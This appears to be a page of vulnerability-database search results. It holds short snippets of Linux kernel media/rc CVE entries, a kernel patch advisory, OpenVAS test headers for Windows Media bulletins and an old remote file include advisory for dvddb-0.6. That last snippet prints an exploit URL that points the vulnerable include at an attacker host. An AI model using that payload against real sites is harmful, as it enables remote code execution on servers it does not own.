CVE-2026-46236

In the Linux kernel, the following vulnerability has been resolved: media: rc: xboxremote: heed DMA restrictions The buffer for IO must not be part of the device structure because that violates the DMA coherency rules...

CVE-2026-46236

The CVE-2026-46236 entry concerns the Linux kernel, specifically the media: rc: xbox_remote path. The issue arises because a buffer for IO is placed within the device structure, which violates DMA coherency rules. Concrete details provided in connected documents confirm the affected component (xb...

CVE-2026-46091

In the Linux kernel, the following vulnerability has been resolved: media: rc: igorplugusb: heed coherency rules In a control request, the USB request structure can be subject to DMA on some HCs. Hence it must obey the rules for DMA coherency. Allocate it separately...

kernel: media: rc: fix races with imon_disconnect()

A use-after-free flaw exists in the Linux kernel’s media/rc subsystem. When the device is disconnected via imondisconnect, the driver may unconditionally release a usbdevice reference via usbputdev even while other operations such as vfdwrite, sendpacket, displayopen, lcdwrite are still in...

kernel: media: rc: fix races with imon_disconnect()

A use-after-free flaw exists in the Linux kernel’s media/rc subsystem. When the device is disconnected via imondisconnect, the driver may unconditionally release a usbdevice reference via usbputdev even while other operations such as vfdwrite, sendpacket, displayopen, lcdwrite are still in...

CVE-2025-39993 media: rc: fix races with imon_disconnect()

In the Linux kernel, the following vulnerability has been resolved: media: rc: fix races with imondisconnect Syzbot reports a KASAN issue as below: BUG: KASAN: use-after-free in createpipe include/linux/usb.h:1945 inline BUG: KASAN: use-after-free in sendpacket+0xa2d/0xbc0...

CVE-2025-39993

CVE-2025-39993 affects the Linux kernel under the media: rc subsystem, specifically the imon_disconnect path that can race with ongoing operations. The root cause is improper synchronization around usb_device references (usbdev_intf0/usbdev_intf1) during disconnect, leading to a use-after-free wh...

CLSA-2023-1682705952 kernel: Fix of 7 CVEs

mISDN: fix use-after-free bugs in l1oip timer handlers CVE-2022-3565 - media: rc: Fix use-after-free bugs caused by enetxirqsim CVE-2023-1118 - Bluetooth: btsdio: fix use after free bug in btsdioremove due to unfinished work CVE-2023-1989 - proc: procskipspaces shouldn't think it is working on C...

Microsoft Windows Media Remote Code Execution Vulnerability (2648048)

This host is missing a critical security update according to Microsoft Bulletin MS11-092. OpenVAS Vulnerability Test $Id: secpodms11-092.nasl 8724 2018-02-08 15:02:56Z cfischer $ Microsoft Windows Media Remote Code Execution Vulnerability 2648048 Authors: Sooraj KS Copyright: Copyright c 2011...

Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030)

This host is missing a critical security update according to Microsoft Bulletin MS11-015. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

dvddb06-rfi.txt

Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...